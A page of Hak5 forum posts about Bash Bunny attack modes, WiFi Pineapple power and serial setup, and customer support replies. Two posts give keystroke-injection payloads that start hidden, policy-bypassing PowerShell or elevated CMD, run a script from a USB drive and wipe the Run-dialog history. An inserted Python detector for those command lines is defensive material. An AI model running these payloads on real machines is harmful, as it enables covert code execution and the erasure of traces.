Darren Kitchen

Posts posted by Darren Kitchen

  1. The default switch2 payload recognizes as storage but not Ethernet on Windows. Same thing with Mac. Go figure - it works on my development Linux box. The issue has to do with composite devices and Windows' ability to recognize RNDIS as one.

    When combining attack modes the Bash Bunny registers as a composite device. Windows doesn't recognize RNDIS_ETHERNET as a composite device by default. Drivers could be installed, but that defeats the purpose in many instances. Alone ATTACKMODE RNDIS_ETHERNET works without drivers on Windows hosts. Thankfully the ATTACKMODE command can be run subsequently to change the state to other modes later on in payloads conditionally.

    As for the USB disk - when the payload executes it can access the storage from /root/udisk. At the moment this gets unmounted from the Linux side when payload execution completes. So if you terminal in and ls /root/udisk you won't see anything. 

     

  2. It really depends on what you're wanting to do. The Armory has some nice specs for a dev platform - so if you have a specific use case in mind and are keen on the programming, go for it. The Bash Bunny is a purpose built pentesting platform. We emphasize the convenience factor and really try to foster a healthy development community around the tools. It's a simple plan that's been working for us for nearly a decade as we've been making infosec tools. So - you could probably do some nifty attacks with the Armory, but there'll be more heavy lifting involved.

    As for the hardware differences - while Micro SD is nice for memory expansion, the fast SLC NAND memory in the Bash Bunny is one of the enabling factors for the quick boot -- which is very important for physical pentest engagements. The Bash Bunny has a 50% higher clock speed and 4x more cores. The other specs like RAM and dimensions are similar. 

    At the end of the day it's really the software, community, and continued support you've come to know from Hak5 that makes the difference. 

    • Upvote 6
  3. The Bash Bunny is not a USB Rubber Ducky replacement. While it's compatible with Ducky Script and supports a HID attack mode, that's only one of 5 current attack vectors.

     

    The USB Rubber Ducky will always execute payloads faster (0.1 seconds vs 7 seconds), more economically (less than half the cost), and more covertly (with its generic flash drive case).

     

    For social engineering ops, USB drops and attacks which require the target to plug in the drive, the USB Rubber Ducky is still the gold standard.

    • Upvote 3
  4. Yes, the ATTACKMODE command accepts most combinations of RNDIS_ETHERNET, ECM_ETHERNET, STORAGE, SERIAL, and HID. Pick 3

    You can also change ATTACKMODE at any time in a payload, conditionally. 

    This thing is a beast...

  5. I don't know about 100 Mb/s - I don't have the means to easily test that right now - but I will say I use a TETRA at home as my primary AP with a dedicated LTE modem and always-on OpenVPN connection and easily achieve 40 Mb/s throughput. The limitation is the LTE modem more than anything as taking the OpenVPN tunnel out of the equation doesn't increase speed coming from the LTE modem. 

    See these Hak5 episodes:

    https://www.hak5.org/frontpage/how-to-build-an-openvpn-access-point-hak5-2017

    https://www.hak5.org/frontpage/hak5-2018-how-to-build-an-openvpn-access-point-pt-2

    https://www.hak5.org/episodes/season-20/hak5-2019-linux-server-build-openvpn-from-scratch

    https://www.hak5.org/episodes/season-21/hak5-2111-how-to-tether-without-the-fees

     

    • Upvote 1
  6. DELAY 3000
    GUI r
    DELAY 100
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass "rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue; $uP = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DK' } | select name; cd $uP.name; .\d.cmd"
    ENTER

    Executes "d.cmd" off the root of the USB drive with the label "DK" and clears Run dialog history, as seen in Hak5 episode 2112.

    To quickly and easily label the USB drive, select it from "My Computer" and press the F2 key.

  7. Fantastic payload 0x41414141

    I really like the run line that both opens an obfuscated CMD as well as removes all traces of the command. Might I make one alteration. On Windows 10 you'll receive the following error:

    The screen cannot be set to the number of lines and columns specified.

    This is because Windows 10 has a minimum command prompt column size of 18, unlike previous versions' 14. So to cover most bases, I recommend:

    STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"

    Superb payload!
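
Added example (not part of the original posts, and not Hak5 code): a defender-side check that flags process command lines which wipe the Run dialog history (RunMRU) while also hiding the window, the combination used in posts 6 and 7. The first two samples are taken from those posts; the last two are constructed benign lines, and the indicator names and alert rule are assumptions of this example.

```python
import re

# Indicators drawn from the two command lines quoted in the posts above.
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden\b"),
    "exec_bypass": re.compile(r"-(ep|ex|exec|executionpolicy)\s+bypass\b"),
    "runmru_wipe": re.compile(
        r"(\brp\b|remove-itemproperty|reg(\.exe)?\s+delete).*runmru"),
    "volume_label_lookup": re.compile(r"win32_volume.*\blabel\b"),
    "tiny_console": re.compile(r"mode\s+con\b.*lines=1\b"),
}
STEALTH = {"hidden_window", "exec_bypass", "tiny_console"}

# Folds typographic quotes (as pasted from a web page) into ASCII quotes.
QUOTES = str.maketrans({"\u2018": "'", "\u2019": "'",
                        "\u201c": '"', "\u201d": '"'})

def indicators(cmdline):
    """Return the sorted names of all indicators found in one command line."""
    text = cmdline.translate(QUOTES).lower()
    return sorted(n for n, rx in INDICATORS.items() if rx.search(text))

def is_suspicious(cmdline):
    """Alert only when Run-history wiping is paired with a stealth option."""
    hits = set(indicators(cmdline))
    return "runmru_wipe" in hits and bool(hits & STEALTH)

SAMPLES = [
    # From post 6 (typographic quotes kept to exercise normalization).
    r'''powershell -NoP -NonI -W Hidden -Exec Bypass "rp -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU’ -Name ‘*’ -ErrorAction SilentlyContinue; $uP = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DK' } | select name; cd $uP.name; .\d.cmd"''',
    # From post 7.
    r'''powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"''',
    # Constructed benign: reads the key, deletes nothing.
    r'reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU',
    # Constructed benign: policy bypass alone is common in admin scripts.
    r'powershell -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1',
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(is_suspicious(s), indicators(s))
```

The same function can be run over the command-line field of process-creation events (for example Sysmon Event ID 1, or Security 4688 with command-line auditing enabled).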
     

  8. QSDx25 -

    While we are a very small team of 4, we strive for excellence. Most correspondence is returned within 1-2 business days. My support queue is empty at the moment, so if for any reason you haven't heard back please email support@hak5.org and I'll see it right away. We unfortunately do not have the bandwidth to offer phone support. Depending on carrier, the tracking # may not update the first day. Sara is staying late answering emails now so you should have received a response if not shortly.

    Kerravon -

    The intention was not to single you out. The posts you are referencing must be from a different era as I haven't seen them. To clarify, the web interface was released as non-commercial creative commons on github. I acknowledge your good intentions and applaud you for your altruistic teaching efforts. That's a noble cause. Please reference our PMs regarding your NANO exchange. I'm happy to know it was just a return without RMA mistake. Sara should be contacting you shortly with details on the replacement.

    Best regards,

    Darren

  9. Kerravon -

    As I have explained to you in PM, these forums are here to support our product -- the WiFi Pineapple. At the time that the original Blue for Pineapple released, the Mark IV was a small volunteer supported endeavor using off-the-shelf equipment, and it was frequently cloned. Had we not sunk everything into the WiFi Pineapple at that time, that would have been the end of the project as we know it.

    Instead we went all in - and since then the WiFi Pineapple has grown into a project that supports the Hak5 team. It has enabled us to produce innovative custom hardware and provide the community with continued software updates for that hardware. It's enabled us to grow our shows, with HakTip, ThreatWire, Metasploit Minute and TekThing joining the ranks of Hak5. All of which provide the community with free education.

    So in short, I'm not "hell bent on keeping this quiet" -- I'm just not keen on spending resources on hosting a forum to support counterfeit devices that diminish the brand we've worked tirelessly to build. You don't need to agree with me, but you should respect my policy to support Hak5 and the half dozen people I employ who rely on this brand.

    Regarding your NANO support, I'm looking at the email thread with you from March 15 where I responded to your request with helpful advice and asked for clarification on a few things. I'm still waiting for a response from you to support@hak5.org.

    And no, Hak5 is not a "F*&%K the customers" sort of company. We stand behind our product and will do whatever it takes to make it right. We didn't get to where we are today without being customer focused. It's the same reason why we have 6 generations of the WiFi Pineapple at the same affordable price point - because unlike many in the InfoSec community we aren't into gouging.

    Lastly, I offer my deepest apologies that this situation has led to such an unhappy customer experience. Like I said, we stand behind our product and will do what it takes to make it right. If you please reply to the email dated March 15 I will happily continue to provide technical support and an exchange if one is needed.

    Best regards,

    Darren

  10. Hi all -

    Just getting back up to speed on this. From what I gather our recent back-end overhaul at wifipineapple.com has caused an issue with OTA module/infusion downloads for the Mark IV. All of these infusions still exist on our servers and I'm working towards making them available for installation by an alternate means shortly. I'll update this thread when it's available.

    Best regards,

    Darren

  11. Smarty -

    With the front (LED side) of the WiFi Pineapple TETRA facing you, the two antennas on the left are wlan0 and the two on the right are wlan1. Another way to look at it is that the two wlan0 antennas are closest to the RJ45 Ethernet port while the two wlan1 antennas are closest to the Reset button. Both radios are in a diversity configuration by default and ship with dual-band antennas.

    Also it sounds like your power issue is related to the extra draw of the LTE modem. The upgraded PSU will fix that. You'll be receiving an email shortly if you haven't already.

    Cheers,

    Darren

    • Upvote 1
  12. I can confirm I had no issues running it for 10+ hours on this configuration:

    Y-cable cord 1:

    2.1a slot of Pineapple 15000

    Y-cable cord 2:

    Anker PowerCore+ 13400 2.4a (http://www.amazon.com/gp/product/B013HSWY5K)

    Standard Micro-Usb cord:

    Anker PowerCore+ 10050 2.4a (http://www.amazon.com/gp/product/B013HSQXZC)

    I also just got the Anker PowerCore 20100 (note no +) which is 2.4a as well (http://www.amazon.com/gp/product/B013HSQXZC) and don't see any reason that wouldn't work as well.

    Note I had 3 separate packs connected to run for that prolonged period of time.

    After returning from deadpool my tetra was restarting after getting pineap flashing the red light, I'm posting the video of it doing this with just the two pineapple 15000 to the thread once I have it uploaded: https://forums.hak5.org/index.php?/topic/37663-pineapple-tetra-reboots-after-a-few-minutes/

    That's 34.5 watts capacity. You'll never draw all of that power. You could get away with any two of the above three and be fine -- but what you're doing with three is prolonging your run time.

  13. It's a desktop, one y cable usb 3 I believe..... I had about 30 minutes to mess with everything today..... It booted I was able to connect.... It ran idle just fine connected to it.....12v 1a power supply that was sent, worked fine idle...... I just couldn't boot with the batteries..... One of them would turn off... No lights..... But you posted a pic in the other thread.... If that's the proper configuration...that is not how I connected....I used one y cable connected to both batteries.....possibly I screwed up..... I'm going to try that..... Maybe tonight.....(its kind of late CT)....

    thank... you... for... the... detailed... response... :lol::grin::cool::tongue::happy:

    • Upvote 1
  14. I know there's a way to do this with screen, but I'm a minicom man myself so I'll give you setup instructions for that:

    Connect cable from PC to TETRA USB UART port

    sudo apt-get install minicom

    sudo minicom -s

    Go to Serial Port setup then make sure it's set to /dev/ttyUSB0 as the device, 115200 as the speed, and 81N as in 8 data bits, 1 stop bit, no parity bit. Then save as default and either exit setup and re-issue sudo minicom without the -s, or select exit which'll drop you into the terminal. Press enter to activate -- you'll be prompted to login.

    If you run this while booting you can watch the kernel come to life. Keep this open and log what happens when there's an issue.

    Lemme tell you - having super convenient serial access in dev has been a boon. I highly recommend it.

    BTW you can do the same in Windows with PuTTY and I'm sure there's something out there for mac.

    I'll let the next guy school me on how screen > minicom later ;-)

  15. Internal code name to differentiate from the NANO - which got its name from a text editor that's better than another text editor that can be read as 6 in roman numerals. If you do the math the TETRA is the 7th WiFi Pineapple hardware to date, but it along with the NANO are sharing the 6th Generation title (and software base). But anyway, the real easter egg is in the stager firmware which you flashed over during initial setup. Oh well...

  16. What battery would you suggest shadowmmm and bored369?

    I'm waiting for a confirmation/recognition of an email sent to hak5, to replace a faulty battery, I can't even boot with the 2 pineapple 15000's I received..... One of them turns off during boot.

    Not really blaming hak5, rf shielding and tweaking raised power consumption. So far with very little testing, my Tetra works fine powered with 12v 1a power supply, and y cable connected to a desktop.

    Again my testing has been limited, not having much time for the next week or so, but I guess I might start looking for alternatives anyway..... I really want to be mobile with my Tetra.

    Just a thought - does your laptop have 3+ USB ports?

  17. Did you email shop@hak5.org ? You should receive a reply in 1-2 business days. I also concur that it sounds like a power issue. Do you have it in this configuration?

    5QwPDXH.jpg

    If it's still happening with 18+ watts (either 2x Pineapple Juice or a 12V/2A adapter) I'll start suspecting software.

    Can you post the output of the serial console from the moment it reboots?
